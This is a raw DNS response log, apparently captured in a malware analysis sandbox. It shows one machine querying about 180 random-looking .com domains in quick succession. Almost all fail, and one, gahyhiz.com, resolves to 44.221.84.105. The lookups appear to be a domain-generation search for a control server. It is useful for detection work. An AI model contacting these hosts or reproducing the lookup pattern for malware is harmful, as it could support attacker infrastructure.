Aug 23, 2024 18:48:56.016215086 CEST	1.1.1.1	192.168.2.4	0x195f	Name error (3)	pumypop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016226053 CEST	1.1.1.1	192.168.2.4	0x8e2b	Name error (3)	vonypic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016746044 CEST	1.1.1.1	192.168.2.4	0xe2c0	Name error (3)	pupybyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016828060 CEST	1.1.1.1	192.168.2.4	0x71d8	Name error (3)	lysynun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016836882 CEST	1.1.1.1	192.168.2.4	0xb920	Name error (3)	qekykal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.017885923 CEST	1.1.1.1	192.168.2.4	0xfd42	Name error (3)	lykyjar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.018085957 CEST	1.1.1.1	192.168.2.4	0xdb11	Name error (3)	vopybym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.019145012 CEST	1.1.1.1	192.168.2.4	0xcd1c	Name error (3)	vojyjot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.019155025 CEST	1.1.1.1	192.168.2.4	0xf518	Name error (3)	lyvytud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.019162893 CEST	1.1.1.1	192.168.2.4	0xb177	Name error (3)	qebytuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.020191908 CEST	1.1.1.1	192.168.2.4	0x3728	Name error (3)	pujyjol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.020745993 CEST	1.1.1.1	192.168.2.4	0xbfdc	Name error (3)	gatyveh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.022108078 CEST	1.1.1.1	192.168.2.4	0xbef7	Name error (3)	qegyhip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.022171974 CEST	1.1.1.1	192.168.2.4	0xe07b	Name error (3)	lyryvaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.022181988 CEST	1.1.1.1	192.168.2.4	0x350f	Name error (3)	puvytuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.022404909 CEST	1.1.1.1	192.168.2.4	0x6b34	Name error (3)	qetyveq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.022416115 CEST	1.1.1.1	192.168.2.4	0x4d04	Name error (3)	gacyryb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.024276972 CEST	1.1.1.1	192.168.2.4	0xee4c	Name error (3)	gaqycow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.024487972 CEST	1.1.1.1	192.168.2.4	0xa1b3	Name error (3)	qexyreg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.025249958 CEST	1.1.1.1	192.168.2.4	0x23aa	Name error (3)	lygygux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.025963068 CEST	1.1.1.1	192.168.2.4	0xd0d8	Name error (3)	pujywep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.026352882 CEST	1.1.1.1	192.168.2.4	0x7a11	Name error (3)	lyxywen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.026912928 CEST	1.1.1.1	192.168.2.4	0x8a8d	Name error (3)	qeqyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.028584003 CEST	1.1.1.1	192.168.2.4	0x6a62	Name error (3)	gatyfuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.028594971 CEST	1.1.1.1	192.168.2.4	0x4e4d	Name error (3)	galyqoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.028604031 CEST	1.1.1.1	192.168.2.4	0xfc65	Name error (3)	volyqam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.029274940 CEST	1.1.1.1	192.168.2.4	0x451f	Name error (3)	puzywag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.029571056 CEST	1.1.1.1	192.168.2.4	0x9a35	Name error (3)	gadyfys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.029669046 CEST	1.1.1.1	192.168.2.4	0xf456	Name error (3)	pumyxul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.031299114 CEST	1.1.1.1	192.168.2.4	0x7e4	Name error (3)	purycaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.031730890 CEST	1.1.1.1	192.168.2.4	0xda21	Name error (3)	vowydet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.033746958 CEST	1.1.1.1	192.168.2.4	0xfd8a	Name error (3)	vojyqac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.033757925 CEST	1.1.1.1	192.168.2.4	0xfb2d	Name error (3)	vofymif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.035614967 CEST	1.1.1.1	192.168.2.4	0x1f40	Name error (3)	gacyzuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.046726942 CEST	1.1.1.1	192.168.2.4	0xab76	Name error (3)	vowycok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.047297955 CEST	1.1.1.1	192.168.2.4	0xea19	Name error (3)	vocyryf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.048623085 CEST	1.1.1.1	192.168.2.4	0x5f07	Name error (3)	pufygup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.049624920 CEST	1.1.1.1	192.168.2.4	0x5270	Name error (3)	lymyxir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.051774025 CEST	1.1.1.1	192.168.2.4	0x8d87	Name error (3)	lysyfed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.052428007 CEST	1.1.1.1	192.168.2.4	0xfacf	Name error (3)	vofyguc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.164192915 CEST	1.1.1.1	192.168.2.4	0x14d4	Name error (3)	gadynub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.171931028 CEST	1.1.1.1	192.168.2.4	0xc00e	Name error (3)	gahyqas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.175589085 CEST	1.1.1.1	192.168.2.4	0x8d9b	Name error (3)	ganypis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.193231106 CEST	1.1.1.1	192.168.2.4	0x9d72	Name error (3)	qedyfyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.232753038 CEST	1.1.1.1	192.168.2.4	0xe016	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.437424898 CEST	1.1.1.1	192.168.2.4	0xed97	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.977052927 CEST	1.1.1.1	192.168.2.4	0x55c5	Name error (3)	vonyzut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.977077007 CEST	1.1.1.1	192.168.2.4	0x5e64	Name error (3)	lykymij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.977087021 CEST	1.1.1.1	192.168.2.4	0xc027	Name error (3)	qekyqoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.977952957 CEST	1.1.1.1	192.168.2.4	0x672e	Name error (3)	qebylyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.977962971 CEST	1.1.1.1	192.168.2.4	0xdb37	Name error (3)	gatydab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.980350971 CEST	1.1.1.1	192.168.2.4	0xf6a6	Name error (3)	gacykas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.980361938 CEST	1.1.1.1	192.168.2.4	0x87a0	Name error (3)	lygynyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.980370998 CEST	1.1.1.1	192.168.2.4	0xb314	Name error (3)	ganyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.980382919 CEST	1.1.1.1	192.168.2.4	0xef12	Name error (3)	qetysog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.980392933 CEST	1.1.1.1	192.168.2.4	0xd66c	Name error (3)	lyryson.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.980860949 CEST	1.1.1.1	192.168.2.4	0x3d76	Name error (3)	purypig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.982306004 CEST	1.1.1.1	192.168.2.4	0x275f	Name error (3)	vojymuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.982316017 CEST	1.1.1.1	192.168.2.4	0x93aa	Name error (3)	vocykec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.983552933 CEST	1.1.1.1	192.168.2.4	0xbe5	Name error (3)	qexykav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.983562946 CEST	1.1.1.1	192.168.2.4	0x684	Name error (3)	vofybet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.983571053 CEST	1.1.1.1	192.168.2.4	0x6b8b	Name error (3)	qeqytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.984128952 CEST	1.1.1.1	192.168.2.4	0x1d49	Name error (3)	lymytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.984138012 CEST	1.1.1.1	192.168.2.4	0x8823	Name error (3)	vowypim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.984146118 CEST	1.1.1.1	192.168.2.4	0xee47	Name error (3)	lysyvax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.985749960 CEST	1.1.1.1	192.168.2.4	0x74a5	Name error (3)	volyjif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.986208916 CEST	1.1.1.1	192.168.2.4	0xf183	Name error (3)	ganyrew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.986218929 CEST	1.1.1.1	192.168.2.4	0xbce1	Name error (3)	qekyhug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.986227036 CEST	1.1.1.1	192.168.2.4	0x7890	Name error (3)	vonyryk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.987160921 CEST	1.1.1.1	192.168.2.4	0x5272	Name error (3)	pumytyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.988259077 CEST	1.1.1.1	192.168.2.4	0x604f	Name error (3)	pupycop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.988307953 CEST	1.1.1.1	192.168.2.4	0x13f8	Name error (3)	vopycoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.988317966 CEST	1.1.1.1	192.168.2.4	0x886	Name error (3)	gatycis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.988357067 CEST	1.1.1.1	192.168.2.4	0xaa03	Name error (3)	lykygun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.988365889 CEST	1.1.1.1	192.168.2.4	0x5c33	Name error (3)	puvywal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.988374949 CEST	1.1.1.1	192.168.2.4	0xcae9	Name error (3)	lyvywar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.989068031 CEST	1.1.1.1	192.168.2.4	0xa6c6	Name error (3)	qegyfeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.989890099 CEST	1.1.1.1	192.168.2.4	0x62ec	Name error (3)	vojygym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.990253925 CEST	1.1.1.1	192.168.2.4	0x9b40	Name error (3)	qexyqip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.990514040 CEST	1.1.1.1	192.168.2.4	0xad47	Name error (3)	lyryxud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.990523100 CEST	1.1.1.1	192.168.2.4	0x4229	Name error (3)	gaqyzyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.991079092 CEST	1.1.1.1	192.168.2.4	0xc22f	Name error (3)	lyxymix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.991569996 CEST	1.1.1.1	192.168.2.4	0x3880	Name error (3)	puzymup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.991580009 CEST	1.1.1.1	192.168.2.4	0xf470	Name error (3)	vowyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.991754055 CEST	1.1.1.1	192.168.2.4	0x810a	Name error (3)	vofydak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.991764069 CEST	1.1.1.1	192.168.2.4	0x87cb	Name error (3)	gadydow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.998276949 CEST	1.1.1.1	192.168.2.4	0x58c3	Name error (3)	puryxuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.999536991 CEST	1.1.1.1	192.168.2.4	0x8e78	Name error (3)	vopydaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.999582052 CEST	1.1.1.1	192.168.2.4	0xfefc	Name error (3)	qegynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.999592066 CEST	1.1.1.1	192.168.2.4	0xe03b	Name error (3)	pupydev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.000287056 CEST	1.1.1.1	192.168.2.4	0x52a5	Name error (3)	gahynuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.002440929 CEST	1.1.1.1	192.168.2.4	0xf328	Name error (3)	lyvylyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.004307032 CEST	1.1.1.1	192.168.2.4	0xa8e9	Name error (3)	lyxyjod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.004317045 CEST	1.1.1.1	192.168.2.4	0xd8f	Name error (3)	puzyjov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.004321098 CEST	1.1.1.1	192.168.2.4	0x3bed	Name error (3)	gadyvez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.004525900 CEST	1.1.1.1	192.168.2.4	0x23e7	Name error (3)	galyhib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.004745960 CEST	1.1.1.1	192.168.2.4	0xcb91	Name error (3)	qedyvap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.004986048 CEST	1.1.1.1	192.168.2.4	0x88e4	Name error (3)	pujygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.008013964 CEST	1.1.1.1	192.168.2.4	0xf265	Name error (3)	qebyrel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.008143902 CEST	1.1.1.1	192.168.2.4	0x4981	Name error (3)	pufybyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.008153915 CEST	1.1.1.1	192.168.2.4	0x9734	Name error (3)	gacyqoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.009202957 CEST	1.1.1.1	192.168.2.4	0xcac0	Name error (3)	gahyfyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.009536982 CEST	1.1.1.1	192.168.2.4	0x480c	Name error (3)	pufydaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.011817932 CEST	1.1.1.1	192.168.2.4	0x8436	Name error (3)	lygyfej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.012336016 CEST	1.1.1.1	192.168.2.4	0xf152	Name error (3)	qeqylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.014053106 CEST	1.1.1.1	192.168.2.4	0xa1fc	Name error (3)	qetyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.017565966 CEST	1.1.1.1	192.168.2.4	0xc400	Name error (3)	vocyqot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.127276897 CEST	1.1.1.1	192.168.2.4	0x28fe	Name error (3)	puvylep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.136080027 CEST	1.1.1.1	192.168.2.4	0x8f23	Name error (3)	pujymiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.530596972 CEST	1.1.1.1	192.168.2.4	0x7ab9	Name error (3)	galynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.532363892 CEST	1.1.1.1	192.168.2.4	0x4e68	Name error (3)	lykynyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.532375097 CEST	1.1.1.1	192.168.2.4	0x1353	Name error (3)	vonykam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.533586025 CEST	1.1.1.1	192.168.2.4	0x42ab	Name error (3)	ganykah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.534379959 CEST	1.1.1.1	192.168.2.4	0xd34a	Name error (3)	qekynyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.536566973 CEST	1.1.1.1	192.168.2.4	0x5b8b	Name error (3)	pupypil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.538196087 CEST	1.1.1.1	192.168.2.4	0x6c2	Name error (3)	qetytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.538207054 CEST	1.1.1.1	192.168.2.4	0x8f68	Name error (3)	gatypuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.539113998 CEST	1.1.1.1	192.168.2.4	0xa50f	Name error (3)	vopyput.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.539125919 CEST	1.1.1.1	192.168.2.4	0x5188	Name error (3)	pujybev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.539135933 CEST	1.1.1.1	192.168.2.4	0x8a54	Name error (3)	qebykoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541836977 CEST	1.1.1.1	192.168.2.4	0xab3b	Name error (3)	gahyvab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541847944 CEST	1.1.1.1	192.168.2.4	0xded5	Name error (3)	vocyjik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541857004 CEST	1.1.1.1	192.168.2.4	0xc11f	Name error (3)	purytyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.544600964 CEST	1.1.1.1	192.168.2.4	0xe2d4	Name error (3)	gacyhuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.544611931 CEST	1.1.1.1	192.168.2.4	0x6cb3	Name error (3)	lygyvon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.545547962 CEST	1.1.1.1	192.168.2.4	0x168d	Name error (3)	qexyhul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.545558929 CEST	1.1.1.1	192.168.2.4	0x7495	Name error (3)	lyxygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.546943903 CEST	1.1.1.1	192.168.2.4	0x2613	Name error (3)	qeqyrav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.546953917 CEST	1.1.1.1	192.168.2.4	0x123a	Name error (3)	gaqyres.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.546963930 CEST	1.1.1.1	192.168.2.4	0xb4c7	Name error (3)	vofycim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.549102068 CEST	1.1.1.1	192.168.2.4	0x59ec	Name error (3)	puzygyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.551019907 CEST	1.1.1.1	192.168.2.4	0xcf07	Name error (3)	lymywad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.552192926 CEST	1.1.1.1	192.168.2.4	0x8209	Name error (3)	lymylen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.553860903 CEST	1.1.1.1	192.168.2.4	0x80a1	Name error (3)	volymuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.555069923 CEST	1.1.1.1	192.168.2.4	0xaf0d	Name error (3)	qedyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.555097103 CEST	1.1.1.1	192.168.2.4	0xd729	Name error (3)	lysysir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.558335066 CEST	1.1.1.1	192.168.2.4	0x29c9	Name error (3)	pumyleg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.559792995 CEST	1.1.1.1	192.168.2.4	0x163d	Name error (3)	pumywov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560779095 CEST	1.1.1.1	192.168.2.4	0x790	Name error (3)	qekyfep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560790062 CEST	1.1.1.1	192.168.2.4	0x26cf	Name error (3)	lysyxuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560798883 CEST	1.1.1.1	192.168.2.4	0xcbd4	Name error (3)	vonyqof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560811043 CEST	1.1.1.1	192.168.2.4	0xc316	Name error (3)	pupyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560820103 CEST	1.1.1.1	192.168.2.4	0x2fd1	Name error (3)	pujydap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560830116 CEST	1.1.1.1	192.168.2.4	0x5704	Name error (3)	vojybef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560838938 CEST	1.1.1.1	192.168.2.4	0xdc59	Name error (3)	gatyzyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560849905 CEST	1.1.1.1	192.168.2.4	0x5f9d	Name error (3)	qebyqig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.560858965 CEST	1.1.1.1	192.168.2.4	0xadc1	Name error (3)	vopyzyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563195944 CEST	1.1.1.1	192.168.2.4	0x89c9	Name error (3)	lyrytyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563206911 CEST	1.1.1.1	192.168.2.4	0x69c2	Name error (3)	lyvymun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563216925 CEST	1.1.1.1	192.168.2.4	0xa9b8	Name error (3)	lyvyjoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563226938 CEST	1.1.1.1	192.168.2.4	0xc32a	Name error (3)	qetylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563235044 CEST	1.1.1.1	192.168.2.4	0x3308	Name error (3)	qegyvag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563251019 CEST	1.1.1.1	192.168.2.4	0xa7e5	Name error (3)	puvyjiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563261032 CEST	1.1.1.1	192.168.2.4	0xc8e9	Name error (3)	lyryler.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.563271046 CEST	1.1.1.1	192.168.2.4	0xf3c6	Name error (3)	vojydoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.565417051 CEST	1.1.1.1	192.168.2.4	0xb35	Name error (3)	vowyrec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.565427065 CEST	1.1.1.1	192.168.2.4	0xb0bc	Name error (3)	vocymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.565434933 CEST	1.1.1.1	192.168.2.4	0x6ee1	Name error (3)	purylal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.567559958 CEST	1.1.1.1	192.168.2.4	0xae63	Name error (3)	lygysid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.567574024 CEST	1.1.1.1	192.168.2.4	0x1abc	Name error (3)	pufycog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.567584038 CEST	1.1.1.1	192.168.2.4	0xfc4	Name error (3)	qegysiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.567594051 CEST	1.1.1.1	192.168.2.4	0x506c	Name error (3)	gacynyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.569489002 CEST	1.1.1.1	192.168.2.4	0xe39d	Name error (3)	pufypuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.574398994 CEST	1.1.1.1	192.168.2.4	0x944d	Name error (3)	gadycih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.578881025 CEST	1.1.1.1	192.168.2.4	0xf5b0	Name error (3)	galyfez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.580502033 CEST	1.1.1.1	192.168.2.4	0xeab7	Name error (3)	lykyfax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.582171917 CEST	1.1.1.1	192.168.2.4	0x36d8	Name error (3)	ganyqib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.586685896 CEST	1.1.1.1	192.168.2.4	0xbef2	Name error (3)	puvymug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.589818954 CEST	1.1.1.1	192.168.2.4	0x7a36	Name error (3)	qexynyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.591650009 CEST	1.1.1.1	192.168.2.4	0x6191	Name error (3)	vowykat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.675163984 CEST	1.1.1.1	192.168.2.4	0x84db	Name error (3)	qedysol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.702476978 CEST	1.1.1.1	192.168.2.4	0xad73	Name error (3)	volygyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.723891020 CEST	1.1.1.1	192.168.2.4	0x2aad	Name error (3)	gahydos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.750113964 CEST	1.1.1.1	192.168.2.4	0xa6bf	Name error (3)	qeqykop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.755199909 CEST	1.1.1.1	192.168.2.4	0x3885	Name error (3)	puzybeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.775290012 CEST	1.1.1.1	192.168.2.4	0xafb7	Name error (3)	gaqykoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.790410995 CEST	1.1.1.1	192.168.2.4	0xd728	Name error (3)	lymyjix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.805619001 CEST	1.1.1.1	192.168.2.4	0x6b92	Name error (3)	gadypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.860790968 CEST	1.1.1.1	192.168.2.4	0x21d1	Name error (3)	pupyteg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.863138914 CEST	1.1.1.1	192.168.2.4	0x53b2	Name error (3)	lyxynej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.863151073 CEST	1.1.1.1	192.168.2.4	0xe7ca	Name error (3)	vofypuf.com	none	none	A (IP address)	IN (0x0001)	false
